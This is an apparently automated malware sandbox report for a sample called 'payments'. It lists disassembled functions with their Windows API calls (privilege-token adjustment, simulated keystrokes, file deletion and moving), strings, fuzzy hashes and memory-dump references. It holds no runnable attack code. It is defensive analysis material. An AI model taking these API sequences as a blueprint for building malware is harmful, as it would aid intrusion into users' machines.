                                                                                                                          • API String ID: 2391024519-0
                                                                                                                          • Opcode ID: 94617efc861c1dcdf96798a1768972d842e088d9ed07f304548c76c9a5f22d6c
                                                                                                                          • Instruction ID: a3ce3fe07ed151ab6a195d290442c1343fe0af18c672ac2459ca33597c5087a8
                                                                                                                          • Opcode Fuzzy Hash: 94617efc861c1dcdf96798a1768972d842e088d9ed07f304548c76c9a5f22d6c
                                                                                                                          • Instruction Fuzzy Hash: D711A731600706BADF18AB74DD0AF9E77A9AF40704F108429F996AA1C1DF70DA06AB60
                                                                                                                          Function 00D09B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearVariant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1473721057-0
                                                                                                                          • Opcode ID: 58e241fc762ad5d369635a25a6afd619f9c2e6a4d3863f11320ab11b46550c9c
                                                                                                                          • Instruction ID: d8b7e8eed27b14563dac55f5209ad4a4b24126cff55d884f2ad0581e730d662d
                                                                                                                          • Opcode Fuzzy Hash: 58e241fc762ad5d369635a25a6afd619f9c2e6a4d3863f11320ab11b46550c9c
                                                                                                                          • Instruction Fuzzy Hash: 3B213B70504702CFDB24DF69C444B1ABBE1BF85348F24496CE59A47362C771E846DF52
                                                                                                                          Function 00CBAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___lock_fhandle.LIBCMT ref: 00CBAFC0
                                                                                                                            • Part of subcall function 00CB7BDA: __getptd_noexit.LIBCMT ref: 00CB7BDA
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1144279405-0
                                                                                                                          • Opcode ID: 6d4e514c83354a483b6b818d85c119a2124ed8b757b667e35e7b111abd6019e9
                                                                                                                          • Instruction ID: 7270a1a11c5c59efa4449a69a593b039a032a95670674370bc2d49556a8b1c33
                                                                                                                          • Opcode Fuzzy Hash: 6d4e514c83354a483b6b818d85c119a2124ed8b757b667e35e7b111abd6019e9
                                                                                                                          • Instruction Fuzzy Hash: 421194B28056109FD7127FA4D8467F97B61AF81332F194344E8745F1E2C7F48D00ABA1
                                                                                                                          Function 00C939DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                          • Instruction ID: cb744774007cf1df854ceac61625842000cc8ca3e7f4519d5e7cc5f8b0ac4077
                                                                                                                          • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                          • Instruction Fuzzy Hash: 3801313150110AEECF05EFA5C896CFEBF74AF21344F54802AF566971A5EB309A49EB60
                                                                                                                          Function 00CB2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __lock_file.LIBCMT ref: 00CB2AED
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __getptd_noexit__lock_file
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2597487223-0
                                                                                                                          • Opcode ID: 0c6c626840081f06da482adc3d7cd43a2c118e9d471821efb08eb36df0799dc2
                                                                                                                          • Instruction ID: 1c866558ea2f781eb582079c1b9f8dec2b8020ce93d07e0b9dc552899d8ec373
                                                                                                                          • Opcode Fuzzy Hash: 0c6c626840081f06da482adc3d7cd43a2c118e9d471821efb08eb36df0799dc2
                                                                                                                          • Instruction Fuzzy Hash: B3F06D31940205ABDF25BF65CC067DF3AA9BF40720F258515F8249A191DB78CA52FB51
                                                                                                                          Function 00C94252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,00C939FE,?,00000001), ref: 00C94286
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 83037abaa16ef694370924b2879067b455f872556f4f6e8a0d6f7258ab243a4b
                                                                                                                          • Instruction ID: 74b702dc32b983e9a5e6779d49f205819362d221b6ecf4f6331c0c78861cabb6
                                                                                                                          • Opcode Fuzzy Hash: 83037abaa16ef694370924b2879067b455f872556f4f6e8a0d6f7258ab243a4b
                                                                                                                          • Instruction Fuzzy Hash: 02F0A970509B02DFCF388F60E888C12BBE0BF003253208A3EF1E682610C732A980DF50
                                                                                                                          Function 00C940A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C940C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongNamePath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 82841172-0
                                                                                                                          • Opcode ID: e6a925a5248b27997ee87a39191b3cf2c8b4fd857f0845fe101de8b599c68da8
                                                                                                                          • Instruction ID: 4c3402de5056e3ecc3e146d7a09722f77d8b696f87d383e2ef1ae0999230889e
                                                                                                                          • Opcode Fuzzy Hash: e6a925a5248b27997ee87a39191b3cf2c8b4fd857f0845fe101de8b599c68da8
                                                                                                                          • Instruction Fuzzy Hash: 81E0CD365003246BC7119658CC46FEA779DDF88690F054075F905D7344DE7499C19690
                                                                                                                          Function 010ACFE0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 010ACFF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                          • Instruction ID: f5a8f21ec470f04021b68aea013f8f67abcd901958520191813098f847eb516e
                                                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                          • Instruction Fuzzy Hash: A1E0BF7498010DEFDB00EFE4D54969E7BB4EF04301F100161FD0192281D63099508A62

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00CFF7FF Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 630windowkeyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00CFF87D
                                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFF8DC
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFF919
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFF940
                                                                                                                          • SendMessageW.USER32 ref: 00CFF966
                                                                                                                          • _wcsncpy.LIBCMT ref: 00CFF9D2
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00CFF9F3
                                                                                                                          • GetKeyState.USER32(00000009), ref: 00CFFA00
                                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFFA16
                                                                                                                          • GetKeyState.USER32(00000010), ref: 00CFFA20
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFFA4F
                                                                                                                          • SendMessageW.USER32 ref: 00CFFA72
                                                                                                                          • SendMessageW.USER32(?,00001030,?,00CFE059), ref: 00CFFB6F
                                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00CFFB85
                                                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CFFB96
                                                                                                                          • SetCapture.USER32(?), ref: 00CFFB9F
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFFC03
                                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CFFC0F
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00CFFC29
                                                                                                                          • ReleaseCapture.USER32 ref: 00CFFC34
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFFC69
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CFFC76
                                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFCD8
                                                                                                                          • SendMessageW.USER32 ref: 00CFFD02
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFD41
                                                                                                                          • SendMessageW.USER32 ref: 00CFFD6C
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CFFD84
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CFFD8F
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFFDB0
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CFFDBD
                                                                                                                          • GetParent.USER32(?), ref: 00CFFDD9
                                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFE3F
                                                                                                                          • SendMessageW.USER32 ref: 00CFFE6F
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFFEC5
                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CFFEF1
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFF19
                                                                                                                          • SendMessageW.USER32 ref: 00CFFF3C
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFFF86
                                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CFFFB6
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00D0004B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                          • String ID: @GUI_DRAGID$@U=u$F
                                                                                                                          • API String ID: 2516578528-1007936534
                                                                                                                          • Opcode ID: c91a1bd46247b2f665c6a64d8c0d7846bf589c94ea953918691fd7d0c289e560
                                                                                                                          • Instruction ID: 3210dd617536164ebded9c56de7787b92574d2f8053f632b1d8f47a7da6e5ae2
                                                                                                                          • Opcode Fuzzy Hash: c91a1bd46247b2f665c6a64d8c0d7846bf589c94ea953918691fd7d0c289e560
                                                                                                                          • Instruction Fuzzy Hash: FB32AC75604349AFDB10CF64C884BBABBA5FF4A394F14062DFA65872A1C771DD02CB62
                                                                                                                          Function 00CFAACE Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 574windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CFB1CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: %d/%02d/%02d$@U=u
                                                                                                                          • API String ID: 3850602802-2764005415
                                                                                                                          • Opcode ID: 4fb8ce3f62117ac096982580a01a7c263e31cf58c8159c6d7a97f3ba880c9c9b
                                                                                                                          • Instruction ID: fa10c3e7f69e5eafa1eabfac0c5ee9da68718e0e683578088afdecd0876ff6ff
                                                                                                                          • Opcode Fuzzy Hash: 4fb8ce3f62117ac096982580a01a7c263e31cf58c8159c6d7a97f3ba880c9c9b
                                                                                                                          • Instruction Fuzzy Hash: 2C12AFB1500319ABEB658F65CC49FBEBBB5FF49710F108119FA19DA2D1DB708942CB22
                                                                                                                          Function 00CAEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00CAEB4A
                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D03AEA
                                                                                                                          • IsIconic.USER32(000000FF), ref: 00D03AF3
                                                                                                                          • ShowWindow.USER32(000000FF,00000009), ref: 00D03B00
                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00D03B0A
                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D03B20
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D03B27
                                                                                                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00D03B33
                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D03B44
                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D03B4C
                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D03B54
                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00D03B57
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B6C
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03B77
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B81
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03B86
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B8F
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03B94
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B9E
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03BA3
                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00D03BA6
                                                                                                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00D03BCD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                          • Opcode ID: 4111d1706b98cfb5d3cefc850129f007786df50aa5ec7926323f3d158df44ae3
                                                                                                                          • Instruction ID: 691141526e3546a65485e3cbf4ce2111536adb443f5a0dedfe6c0b823cd90193
                                                                                                                          • Opcode Fuzzy Hash: 4111d1706b98cfb5d3cefc850129f007786df50aa5ec7926323f3d158df44ae3
                                                                                                                          • Instruction Fuzzy Hash: 53319471A403187BFB205BA59C49FBF7E6DEB45B54F108015FA05EA2D1DBB09D01EAB0
                                                                                                                          Function 00CCACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCB180
                                                                                                                            • Part of subcall function 00CCB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCB1AD
                                                                                                                            • Part of subcall function 00CCB134: GetLastError.KERNEL32 ref: 00CCB1BA
                                                                                                                          • _memset.LIBCMT ref: 00CCAD08
                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CCAD5A
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CCAD6B
                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CCAD82
                                                                                                                          • GetProcessWindowStation.USER32 ref: 00CCAD9B
                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00CCADA5
                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CCADBF
                                                                                                                            • Part of subcall function 00CCAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCACC0), ref: 00CCAB99
                                                                                                                            • Part of subcall function 00CCAB84: CloseHandle.KERNEL32(?,?,00CCACC0), ref: 00CCABAB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                          • String ID: $default$winsta0
                                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                                          • Opcode ID: 55007e332814fc2749dba21e7b52c6b0be1a92e7065e290927f22dbc67a779bd
                                                                                                                          • Instruction ID: a7b3f0e2640f403c1d92df7b2d10416dad15bd36e0e9996a0fdeb7b497dd6e7f
                                                                                                                          • Opcode Fuzzy Hash: 55007e332814fc2749dba21e7b52c6b0be1a92e7065e290927f22dbc67a779bd
                                                                                                                          • Instruction Fuzzy Hash: 0981367190020DAFDF119FA4DC49EEEBB79EF08308F14811DF925A62A1DB318E55DB62
                                                                                                                          Function 00CD60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD5FA6,?), ref: 00CD6EF1
                                                                                                                            • Part of subcall function 00CD725E: __wsplitpath.LIBCMT ref: 00CD727B
                                                                                                                            • Part of subcall function 00CD725E: __wsplitpath.LIBCMT ref: 00CD728E
                                                                                                                            • Part of subcall function 00CD72CB: GetFileAttributesW.KERNEL32(?,00CD6019), ref: 00CD72CC
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6149
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6167
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CD618E
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD61A4
                                                                                                                          • _wcscpy.LIBCMT ref: 00CD6209
                                                                                                                          • _wcscat.LIBCMT ref: 00CD621C
                                                                                                                          • _wcscat.LIBCMT ref: 00CD622F
                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD625D
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00CD626E
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00CD6289
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00CD6298
                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00CD62AD
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00CD62BE
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD62E1
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD62FD
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD630B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                          • String ID: \*.*
                                                                                                                          • API String ID: 1917200108-1173974218
                                                                                                                          • Opcode ID: 4fae4f3b549e3891d55e579b851796c8fb1e6efdb7bcf28516475bfaef15a318
